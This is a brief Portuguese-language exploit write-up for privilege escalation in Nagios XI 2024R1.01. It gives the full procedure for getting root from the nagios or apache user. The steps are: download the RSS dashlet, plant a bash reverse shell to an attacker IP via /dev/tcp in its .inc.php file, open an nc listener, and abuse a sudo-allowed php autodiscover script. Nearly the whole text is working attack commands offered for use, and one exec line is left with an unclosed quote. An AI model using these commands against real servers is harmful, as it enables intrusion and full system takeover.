
Exploit de escalada de privilégios para Nagios XI 2024R1.01, permitindo acesso root completo a partir de usuários NAGIOS ou APACHE via injeção de dashlet RSS malicioso e execução de comandos sudo.
CVE Descoberto por: K. Wahab (Neo`X)
O RSS Dashlet é usado neste exemplo.
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
Acesse a página de gerenciamento de "dashlets" e baixe um Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
Modifique o *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

nc -nlvp 4441
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Nota : Após executar o comando, você receberá uma conexão como APACHE, use CTRL+C para sair e reinicie o listener novamente várias vezes)
